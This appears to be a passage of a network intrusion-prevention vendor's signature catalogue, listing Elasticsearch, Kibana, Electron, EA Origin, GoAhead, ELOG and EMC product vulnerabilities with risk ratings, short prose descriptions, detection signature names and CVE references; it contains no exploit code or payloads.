Risk:

Moderate

First detected in:

sgpkg-ips-1125-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Input Validation

Description:

There has been reported a local file inclusion vulnerability in Kibana. This vulnerability could be exploited by an authenticated attacker. Successful exploitation can lead in arbitrary code execution.

Situation:

HTTP_CSU-Elastic-Kibana-Server.js-Local-File-Inclusion

References:

CVE-2018-17246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17246

Elastic-Kibana-Timelion-Prototype-Pollution

About this vulnerability:

A vulnerability in Elastic Kibana

Risk:

Moderate

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Input Validation

Description:

There exists a post-auth prototype pollution vulnerability in the Timelion visualizer component of Kibana. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Elastic-Kibana-Timelion-Prototype-Pollution

References:

CVE-2019-7609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7609

ElasticSearch-Dynamic-Scripting-Code-Execution

About this vulnerability:

An ElasticSearch Dynamic Scripting Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Input Validation

Description:

A vulnerability in ElasticSearch, versions before 1.2, which allow remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search.

Situation:

HTTP_CRL_ElasticSearch-Dynamic-Scripting-Code-Execution

References:

CVE-2014-3120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3120

BID-67731
http://www.securityfocus.com/bid/67731

OSVDB-106949
http://www.osvdb.org/106949

ElasticSearch-File-Discosure

About this vulnerability:

An ElasticSearch File Discosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Directory Traversal

Description:

A vulnerability in ElasticSearch, versions before 1.6.1, which allows remote attackers to read arbitrary files via a directory traversal in the URI.

Situation:

HTTP_CSU-ElasticSearch-File-Discosure

References:

CVE-2015-5531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531

ElasticSearch-Memory-Disclosure

About this vulnerability:

An attempt to exploit a vulnerability in Elasticsearch detected

Risk:

High

First detected in:

sgpkg-ips-1654-5242

Last changed:

sgpkg-ips-1654-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Malfunction

Description:

A vulnerability in Elasticsearch, versions 7.10.0 to 7.13.3, which allows remote attackers to send a malformed query and generate an error message containing previously used portions of a data buffer which could contain sensitive information such as Elasticsearch documents or authentication details.

Situation:

HTTP_CRL-ElasticSearch-Memory-Disclosure

References:

CVE-2021-22145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22145

ElasticSearch-Search-Groovy-Sandbox-Bypass

About this vulnerability:

An ElasticSearch Search Groovy Sandbox Bypass vulnerability.

Risk:

High

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Insecure Configuration

Description:

A vulnerability in ElasticSearch, versions before 1.3.8 and 1.4.x before 1.4.3, which allows remote attackers to bypass sandbox protection mechanisms and execute arbitrary shell commands via crafted scripts.

Situation:

HTTP_CRL-ElasticSearch-Search-Groovy-Sandbox-Bypass

References:

CVE-2015-1427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427

ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization

About this vulnerability:

A vulnerability in Elastic Elasticsearch

Risk:

Moderate

First detected in:

sgpkg-ips-994-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Input Validation

Description:

Insecure deserialization of untrusted ThrowableObjectInputStream data causes a code execution vulnerability in ElasticSearch. A successful attack can result in arbitrary code execution with the privileges of the affected java process.

Situation:

Generic_SS-ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization

References:

CVE-2015-5377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5377

Electro-Infection-Traffic

About this vulnerability:	Electro infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1358-5242
Last changed:	sgpkg-ips-1358-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Electro infection traffic was detected.
Situation:	HTTP_CRL-Electro-Infection-Traffic

Electron-Setasdefaultprotocolclient-Command-Injection

About this vulnerability:

A vulnerability in Electronjs Electron

Risk:

Moderate

First detected in:

sgpkg-ips-1042-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Electronjs Electron

Type:

Input Validation

Description:

Improper validation of inputs causes a command injection vulnerability in Electron and applications built with it. A successful exploit allows an attacker to run arbitrary commands on the target system.

Situation:

HTTP_SHS-Electron-Setasdefaultprotocolclient-Command-Injection
File-Text_Electron-Setasdefaultprotocolclient-Command-Injection

References:

CVE-2018-1000006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000006

Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution

About this vulnerability:

A vulnerability in Electronic Arts Origin

Risk:

Moderate

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Electronic Arts Origin

Type:

Input Validation

Description:

There has been reported a remote code execution vulnerability the Electronic Arts Origin Client. This vulnerability can be exploited by opening a malicious web page.

Situation:

HTTP_SHS-Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution
File-Text_Electronic-Arts-Origin-Client-URI-Handler-Remote-Code-Execution

References:

CVE-2019-12828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12828

Electronic-Arts-Origin-Client-URI-Handler-Template-Injection

About this vulnerability:

A vulnerability in Electronic Arts Origin

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Electronic Arts Origin

Type:

Input Validation

Description:

Improper validation of data in the title parameter in a origin2:// URI causes a template injection vulnerability in EA Origin. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Electronic-Arts-Origin-Client-URI-Handler-Template-Injection

References:

CVE-2019-11354
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11354

Electronic-Arts-SnoopyCtrl-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability:

A vulnerability in Electronic Arts SnoopyCtrl ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Electronic Arts SnoopyCtrl

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Electronic Arts SnoopyCtrl control. The vulnerability is due to a lack of input validation when handling arguments of various methods. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow
File-Text_Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow

References:

CVE-2007-4466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4466

BID-25970
http://www.securityfocus.com/bid/25970

OSVDB-37723
http://www.osvdb.org/37723

ElectronJS-Exodus-Wallet-Remote-Code-Execution

About this vulnerability:

An ElectronJS Exodus Wallet Remote Code Execution Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1074-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Electronjs Electron

Type:

Input Validation

Description:

A vulnerability in ElectronJS, Exodus Wallet, versions 1.6.x, 1.7.x, 1.8.x, which allows remote attackers to execute arbitrary code via a specially crafted URL.

Situation:

File-Text_ElectronJS-Exodus-Wallet-Remote-Code-Execution

References:

CVE-2018-1000006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000006

elFinder-PHP-Connector-Exiftran-Command-Injection

About this vulnerability:

A vulnerability in elFinder

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

elFinder

Type:

Input Validation

Description:

A vulnerability in elFinder, versions before 2.1.48, which allows remote code execution through the PHP connector component, due to insufficient input validation.

Situation:

HTTP_CS-elFinder-PHP-Connector-Exiftran-Command-Injection

References:

CVE-2019-9194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9194

Elipse-E3-ActiveReports-ActiveX-Vulnerability

About this vulnerability:	A vulnerability in Elipse E3 ActiveReports
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Elipse E3 ActiveReports
Type:	Malfunction
Description:	There is a directory traversal vulnerability in Elipse E3 ActiveReports. The vulnerability is due to insufficient validation of parameters used in the SaveLayout() method in an ActiveX control. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation:	File-Text_Elipse-E3-ActiveReports-ActiveX-Vulnerability

Elm-Expires-Header-Field-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Elm's expires header field parsing

Risk:

Moderate

First detected in:

sgpkg-ips-36-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

ELM

Type:

Buffer Overflow

Description:

ELM (Electronic Mail for UNIX) has a buffer overflow vulnerability in the parsing of the 'Expires:' header field. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

E-Mail_HCS-Elm-Expires-Header-Field-Buffer-Overflow

References:

CVE-2005-2665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2665

BID-14613
http://www.securityfocus.com/bid/14613

Elog-Project-Elog-Retrieve_URL-Information-Disclosure

About this vulnerability:

A vulnerability in ELOG Project ELOG

Risk:

Moderate

First detected in:

sgpkg-ips-1218-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ELOG

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in ELOG. This vulnerability is due to a design flaw in retrieve_url() when attempting to access externally located files that a user wishes to store. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious HTTP request to the target server. Successful exploitation will cause the ELOG server to disclose the password hash for a user.

Situation:

HTTP_CSH-Elog-Project-Elog-Retrieve_URL-Information-Disclosure

References:

CVE-2019-3993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3993

Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in ELOG Project ELOG

Risk:

High

First detected in:

sgpkg-ips-1216-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ELOG

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in the ELOG. The vulnerability is due to a NULL pointer dereference while processing an upload HTTP request if the "drop-count" request parameter is missing in the request. A remote unauthenticated attacker could exploit this vulnerability by sending malicious HTTP request to a targeted server. Successful exploitation will cause the ELOG server to abnormally terminate.

Situation:

HTTP_CRL-Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference

References:

CVE-2019-3995
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3995

Elog-Web-Logbook-BOF

About this vulnerability:

Buffer overflow in Elog Web logbook

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Elog Web Logbook

Type:

Buffer Overflow

Description:

Elog Web logbook is vulnerable to a heap-based buffer overflow. A remote attacker could exploit this vulnerability to execute arbitrary code on the server.

Situation:

HTTP_CS-Elog-Web-Logbook-BOF

References:

CVE-2005-0439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0439

BID-12556
http://www.securityfocus.com/bid/12556

OSVDB-13812
http://www.osvdb.org/13812

Embedded-Object-In-HTML

About this vulnerability:	External embedded object initialization in HTML
Risk:	Low
First detected in:	sgpkg-ips-132-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	It is possible to embed references to external objects in Hypertext Markup Language (HTML). While the use of these objects is completely normal in most cases, they may contain security vulnerabilities.
Situation:	HTTP_SS-Embedded-ActiveX-Object-In-HTML HTTP_SS-Embedded-Java-Applet-In-HTML File-Text_Embedded-ActiveX-Object-In-HTML File-Text_Embedded-Java-Applet-In-HTML

Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in EmbedThis GoAhead

Risk:

Moderate

First detected in:

sgpkg-ips-1173-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EmbedThis GoAhead

Type:

Input Validation

Description:

There has been reported an out of bounds read vulnerability in EmbedThis GoAhead. This vulnerability could be exploited remotely. Successful exploitation can lead in denial of service conditions.

Situation:

HTTP_CS-Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read

References:

CVE-2019-12822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12822

Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution

About this vulnerability:

A vulnerability in EmbedThis GoAhead

Risk:

Moderate

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EmbedThis GoAhead

Type:

Input Validation

Description:

Improper validation of cgi-bin request parameters causes a remote code execution vulnerability in EmbedThis GoAhead. A successful exploitation allows an attacker to run arbitrary code on the target system.

Situation:

HTTP_URI-Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution

References:

CVE-2017-17562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17562

Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE

About this vulnerability:

A vulnerability in EmbedThis GoAhead Web Server.

Risk:

High

First detected in:

sgpkg-ips-1427-5242

Last changed:

sgpkg-ips-1427-5242

Platform:

Generic

Software:

EmbedThis GoAhead

Type:

Input Validation

Description:

A vulnerability in EmbedThis GoAhead Web Server, versions 4.x and 5.x prior to 5.1.5, which allows remote attackers to execute arbitrary code by sending a malicious request to the server, due to improper validation of user form variables passed to the file upload filter.

Situation:

HTTP_CS-Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE

References:

CVE-2021-42342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42342

Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service

About this vulnerability:

A vulnerability in EmbedThis GoAhead

Risk:

High

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1355-5242

Platform:

Generic

Software:

EmbedThis GoAhead

Type:

Infinite Loop

Description:

A denial of service vulnerability has been reported in EmbedThis GoAhead Web Server. The vulnerability is due to an infinite loop when processing a request where the connection to the client is closed before the server has received all the expected data. The server may still be able to process other requests depending on the availability of resources. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the server and subsequently terminating the connections. Successful exploitation could lead to denial of service conditions.

Situation:

HTTP_SLS-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
HTTP_CSH-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service

References:

CVE-2019-5097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5097

Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free

About this vulnerability:

A vulnerability in EmbedThis GoAhead

Risk:

Moderate

First detected in:

sgpkg-ips-1220-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EmbedThis GoAhead

Type:

Malfunction

Description:

There has been reported a pre-auth use-after-free vulnerability in EmbedThis GoAhead Web Server. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CS-Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free

References:

CVE-2019-5096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5096

EMC-Alphastor-3.1-Buffer-Overflow

About this vulnerability:

EMC Alphastor 3.1 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC AlphaStor

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in EMC AlphaStor 3.1, in the command line interface process of the server agent, which allows attackers to remotly execute arbitrary code via crafted TCP packets.

Situation:

Generic_CS-EMC-Alphastor-3.1-Buffer-Overflow

References:

CVE-2008-2158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2158

BID-29399
http://www.securityfocus.com/bid/29399

OSVDB-45714
http://www.osvdb.org/45714

EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in EMC AlphaStor Device Manager

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AlphaStor

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in EMC AlphaStor Device Manager (DCP). The vulnerability is due to insufficient boundary checks during creation of a device name. An unauthenticated attacker can exploit this vulnerability to cause denial of service or execute arbitrary code in the context of the affected service.

Situation:

Generic_CS-EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow

References:

CVE-2013-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0930

OSVDB-89436
http://www.osvdb.org/89436

EMC-Alphastor-Device-Manager-Command-Injection

About this vulnerability:

A vulnerability in EMC AlphaStor

Risk:

Moderate

First detected in:

sgpkg-ips-508-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AlphaStor

Type:

Input Validation

Description:

There is a command injection vulnerability in EMC AlphaStor Device Manager. The vulnerability is caused by insufficient sanitization when processing certain Networker commands. An unauthenticated attacker can exploit this vulnerability to cause a denial of service or execute arbitrary commands in the context of the affected service.

Situation:

Generic_CS-EMC-Alphastor-Device-Manager-Command-Injection

References:

CVE-2013-0928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0928

BID-57472
http://www.securityfocus.com/bid/57472

OSVDB-89436
http://www.osvdb.org/89436

EMC-Alphastor-Device-Manager-Format-String-Vulnerability

About this vulnerability:

A vulnerability in EMC AlphaStor

Risk:

High

First detected in:

sgpkg-ips-508-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AlphaStor

Type:

Format String

Description:

A format string vulnerability exists in EMC AlphaStor Device Manager. The vulnerability is caused by insufficient sanitization when processing certain requests. An unauthenticated attacker can exploit this vulnerability to cause a denial of service or execute arbitrary commands in the context of the affected service, which is System on Windows platforms.

Situation:

Generic_CS-EMC-Alphastor-Device-Manager-Format-String-Vulnerability

References:

CVE-2013-0929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0929

BID-57472
http://www.securityfocus.com/bid/57472

OSVDB-89435
http://www.osvdb.org/89435

EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in EMC AlphaStor

Risk:

Moderate

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AlphaStor

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in EMC AlphaStor Library Control Program (LCP) while parsing remote requests. The vulnerabilities are due to missing bounds check while copying request data into fixed length stack buffers. A remote unauthenticated attacker can exploit these vulnerabilities to cause denial of service or execute arbitrary code in the context of the affected service.

Situation:

Generic_CS-EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows

References:

CVE-2013-0946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0946

BID-59794
http://www.securityfocus.com/bid/59794

OSVDB-93139
http://www.osvdb.org/93139

EMC-Autostart-Error-Logging-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in EMC AutoStart

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AutoStart

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in the Agent Service of EMC AutoStart. This vulnerability is caused by using user controlled string values as parameters to a format string function without proper boundary checking. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code within the context of the affected service, which is SYSTEM on Windows platforms.

Situation:

Generic_CS-EMC-Autostart-Error-Logging-Stack-Buffer-Overflow

References:

CVE-2011-2735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2735

BID-49238
http://www.securityfocus.com/bid/49238

OSVDB-74597
http://www.osvdb.org/74597

EMC-Autostart-Ftagent-Opcode-20-Multiple-Subcodes-Remote-Command-Execution

About this vulnerability:

Vulnerabilities in EMC AutoStart

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AutoStart

Type:

Malfunction

Description:

Multiple remote command execution vulnerabilities exist in EMC AutoStart. The vulnerabilities are due to insecure communication between the ftagent processes on nodes of an AutoStart cluster. A remote unauthenticated attacker can leverage these vulnerabilities by sending malicious requests to the ftagent process. Successful exploitation will result in execution of arbitrary commands with SYSTEM privileges on Windows platforms or root privileges on Unix-like systems.

Situation:

Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2060-Remote-Command-Execution
Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2219-Remote-Command-Execution
Generic_CS-EMC-Autostart-Ftagent-Opcode-83-Subcode-22-SQL-Injection

References:

CVE-2015-0538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0538

EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection

About this vulnerability:

A vulnerability in EMC AutoStart

Risk:

High

First detected in:

sgpkg-ips-668-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AutoStart

Type:

Input Validation

Description:

A remote SQL injection vulnerability exists in EMC AutoStart. The vulnerability is due to insufficient validation of remotely supplied data within the ftagent component. A remote unauthenticated attacker can leverage this vulnerability by sending malicious requests to the ftagent process. Successful exploitation will result in execution of arbitrary code with SYSTEM privileges on Windows platforms or root privileges on Unix-like systems.

Situation:

Generic_CS-EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection

References:

CVE-2015-0538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0538

EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities

About this vulnerability:

A vulnerability in EMC AutoStart

Risk:

Moderate

First detected in:

sgpkg-ips-473-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AutoStart

Type:

Integer Overflow

Description:

Multiple buffer overflow vulnerabilities have been reported in EMC AutoStart. These vulnerabilities are caused by integer overflow errors while calculating heap buffer sizes. An unauthenticated, remote attacker can exploit this vulnerability to cause a denial of service or possibly execute arbitrary code within the context of the affected application, which is SYSTEM.

Situation:

Generic_CS-EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities

References:

CVE-2012-0409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0409

BID-53682
http://www.securityfocus.com/bid/53682

OSVDB-82338
http://www.osvdb.org/82338

EMC-Autostart-Ftagent.exe-Null-Byte-Write

About this vulnerability:

A vulnerability in EMC AutoStart

Risk:

High

First detected in:

sgpkg-ips-474-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC AutoStart

Type:

Malfunction

Description:

There is a memory corruption vulnerability in EMC AutoStart. This vulnerability is caused by a failure to validate a user controlled value. This results in a Null byte write at a user controlled address. An unauthenticated, remote attacker can exploit this vulnerability to cause a denial of service or possibly execute arbitrary code within the context of the affected application, which is SYSTEM.

Situation:

Generic_CS-EMC-Autostart-Ftagent.exe-Null-Byte-Write

References:

CVE-2012-0409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0409

BID-53682
http://www.securityfocus.com/bid/53682

OSVDB-82338
http://www.osvdb.org/82338

EMC-Captiva-PixTools-Distributed-Imaging-ActiveX-Control-File-Creation

About this vulnerability:

An arbitrary file creation vulnerability in EMC Captiva PixTools

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC Captiva PixTools

Type:

Malfunction

Description:

There is a vulnerability in an ActiveX control distributed within EMC Captiva PixTools. The vulnerability is due to unrestricted access to the "SetLogFileName" and "WriteToLog" methods, which attackers can exploit to create or overwrite arbitrary files on a target host and potentially execute malicious code by enticing a user to visit a maliciously crafted web page.

Situation:

HTTP_SS-EMC-Captiva-PixTools-ActiveX-Control-File-Creation
File-Text_EMC-Captiva-PixTools-ActiveX-Control-File-Creation

References:

BID-36566
http://www.securityfocus.com/bid/36566

EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow

About this vulnerability:	A vulnerability in EMC QuickScan Pro
Risk:	High
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	EMC Captiva QuickScan Pro; EMC Documentum ApplicationXtender Desktop
Type:	Buffer Overflow
Description:	There is a stack-based buffer overflow vulnerability in EMC Captiva QuickScan Pro KeyHelp ActiveX control. The flaw is due to insufficient boundary checks on user-supplied input. A remote attack can exploit this vulnerability by enticing a target user to visit a maliciously crafted web page. A successful attack may lead to arbitrary code execution in the context of the current user.
Situation:	HTTP_SS-EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow File-Text_EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow

EMC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Directory Traversal

Description:

There is a code execution vulnerability in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the FileUploadController servlet of http-file-upload.war when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CS-ENC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload

References:

CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810

OSVDB-101195
http://www.osvdb.org/101195

EMC-Cmcne-Fileuploadcontroller-Information-Disclosure

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-572-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Input Validation

Description:

An information disclosure vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to insufficient input validation in the FileUploadController servlet when processing certain HTTP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. In a successful attack scenario, the attacker can disclose the contents of arbitrary files on the local filesystem.

Situation:

HTTP_CS-EMC-Cmcne-Fileuploadcontroller-Information-Disclosure

References:

CVE-2014-2276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2276

BID-66308
http://www.securityfocus.com/bid/66308

OSVDB-104671
http://www.osvdb.org/104671

EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the BootFileUploadMoreInfoServlet servlet of inmservlets.war when processing HTTP requests. A remote unauthenticated attacker can copy any files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal

References:

CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810

OSVDB-100899
http://www.osvdb.org/100899

EMC-Cmcne-Inmservlets-CSV-Information-Disclosure

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-562-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in EMC Connectrix Manager Converged Network Edition. The vulnerability is due to lack of authentication and insufficient input validation in the csv_page.jsp page of inmservlets.war when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.

Situation:

HTTP_CSU-EMC-Cmcne-Inmservlets-CSV-Information-Disclosure

References:

CVE-2013-6810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6810

OSVDB-101210
http://www.osvdb.org/101210

EMC-Cmcne-Inmservlets-Unifiedfileuploadmoreinfoservlet-Directory-Traversal

About this vulnerability:

A vulnerability in EMC Connectrix Manager Converged Network Edition

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Connectrix Manager

Type:

Directory Traversal

Description:

